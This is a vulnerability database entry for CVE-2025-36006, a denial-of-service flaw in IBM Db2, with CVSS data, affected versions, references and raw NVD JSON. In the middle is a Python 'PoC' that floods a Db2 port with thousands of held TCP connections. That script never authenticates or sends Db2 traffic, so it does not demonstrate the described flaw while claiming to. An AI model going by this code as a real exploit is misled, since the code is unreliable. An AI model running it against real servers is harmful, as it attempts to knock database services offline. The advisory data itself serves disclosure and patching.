CVE-2025-36006

Description

IBM Db2 10.5.0 through 10.5.11, 11.1.0 through 11.1.4.7, 11.5.0 through 11.5.9, and 12.1.0 through 12.1.3 for Linux, UNIX and Windows (includes Db2 Connect Server) could allow an authenticated user to cause a denial due to the improper release of resources after use.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:* - VULNERABLE

cpe:2.3:a:ibm:db2:*:*:*:*:*:unix:*:* - VULNERABLE

cpe:2.3:a:ibm:db2:*:*:*:*:*:windows:*:* - VULNERABLE

cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:* - VULNERABLE

cpe:2.3:a:ibm:db2:*:*:*:*:*:unix:*:* - VULNERABLE

IBM Db2 10.5.0 - 10.5.11 (Linux, UNIX, Windows)

IBM Db2 11.1.0 - 11.1.4.7 (Linux, UNIX, Windows)

IBM Db2 11.5.0 - 11.5.9 (Linux, UNIX, Windows)

IBM Db2 12.1.0 - 12.1.3 (Linux, UNIX, Windows)

IBM Db2 Connect Server (所有受影响版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket
import time

# CVE-2025-36006 PoC - IBM Db2 Resource Release Vulnerability
# This PoC demonstrates resource exhaustion via repeated authenticated queries
# Note: Requires valid IBM Db2 credentials

def connect_db2(host, port, username, password):
    """Establish connection to IBM Db2 server"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((host, port))
        # Db2 connection protocol handshake
        # In real attack, use db2 CLI or Python ibm_db module
        return sock
    except Exception as e:
        print(f"Connection failed: {e}")
        return None

def trigger_resource_exhaustion(host, port, iterations=10000):
    """Trigger vulnerability by exhausting resources through repeated queries"""
    print(f"[*] Starting resource exhaustion attack on {host}:{port}")
    print(f"[*] Target: CVE-2025-36006 - IBM Db2 Improper Resource Release")
    
    connections = []
    try:
        for i in range(iterations):
            # Create connections without proper cleanup
            conn = connect_db2(host, port, "valid_user", "valid_pass")
            if conn:
                connections.append(conn)
                # Execute queries that may trigger resource leak
                if i % 100 == 0:
                    print(f"[*] Iteration {i}: Active connections: {len(connections)}")
            time.sleep(0.01)
            
            # After resource exhaustion, service becomes unavailable
            if len(connections) >= 5000:
                print("[!] Resources likely exhausted - service may be down")
                break
                
    except KeyboardInterrupt:
        print("\n[!] Attack interrupted by user")
    finally:
        print(f"[*] Attack completed - {len(connections)} connections held")
        print("[*] In real scenario, service should be unavailable")

if __name__ == "__main__":
    # Configuration
    TARGET_HOST = "192.168.1.100"
    TARGET_PORT = 50000  # Default IBM Db2 port
    
    print("=" * 60)
    print("CVE-2025-36006 IBM Db2 DoS PoC")
    print("=" * 60)
    trigger_resource_exhaustion(TARGET_HOST, TARGET_PORT)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-36006
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-36006
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-36006/
[4] VulDB https://vuldb.com/cve/CVE-2025-36006
[5] https://www.ibm.com/support/pages/node/7250479

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-36006", "sourceIdentifier": "[email protected]", "published": "2025-11-07T19:16:23.770", "lastModified": "2025-11-19T16:31:34.320", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Db2 10.5.0 through 10.5.11, 11.1.0 through 11.1.4.7, 11.5.0 through 11.5.9, and 12.1.0 through 12.1.3 for Linux, UNIX and Windows (includes Db2 Connect Server) could allow an authenticated user to cause a denial due to the improper release of resources after use."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-404"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:*", "versionStartIncluding": "10.5.0.0", "versionEndIncluding": "10.5.0.11", "matchCriteriaId": "385D4613-C252-4075-8485-55B8E32DC970"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:unix:*:*", "versionStartIncluding": "10.5.0.0", "versionEndIncluding": "10.5.0.11", "matchCriteriaId": "9DD542DB-0839-4057-8551-55154788182A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:windows:*:*", "versionStartIncluding": "10.5.0.0", "versionEndIncluding": "10.5.0.11", "matchCriteriaId": "D9ED6DEF-712F-4BB0-8676-D5DB6A269EBF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:*", "versionStartIncluding": "11.1.0", "versionEndIncluding": "11.1.4.7", "matchCriteriaId": "3B5A9A8A-5EE6-428A-8B3D-543B2F84D615"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:unix:*:*", "versionStartIncluding": "11.1.0", "versionEndIncluding": "11.1.4.7", "matchCriteriaId": "5971CCFD-FB34-4216-8A87-A4310EF34F23"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:windows:*:*", "versionStartIncluding": "11.1.0", "versionEndIncluding": "11.1.4.7", "matchCriteriaId": "960AA97F-0D2C-4B33-9754-69BC28399BCE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:*", "versionStartIncluding": "11.5.0", "versionEndIncluding": "11.5.9", "matchCriteriaId": "ECAF5576-B4A5-4DB7-94F0-942F656F0461"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:unix:*:*", "versionStartIncluding": "11.5.0", "versionEndIncluding": "11.5.9", "matchCriteriaId": "B1E165E8-F11B-4F13-B54A-90D29CA2ABF8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:windows:*:*", "versionStartIncluding": "11.5.0", "versionEndIncluding": "11.5.9", "matchCriteriaId": "727E2804-2D3D-4C31-A3E5-F99107D02A27"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:linux:*:*", "versionStartIncluding": "12.1.0", "versionEndIncluding": "12.1.3", "matchCriteriaId": "2AA1764B-CD82-4B33-B85B-27CA2F7C0ED5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:unix:*:*", "versionStartIncluding": "12.1.0", "versionEndIncluding": "12.1.3", "matchCriteriaId": "8F63D92C-AC19-4FB0-A605-08DC01875E7B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:db2:*:*:*:*:*:windows:*:*", "versionStartIncluding": "12.1.0", "versionEndIncluding": "12.1.3", "matchCriteriaId": "E28DCDF3-EF5B-47D6-BD38-C98334B67BE4"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7250479", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}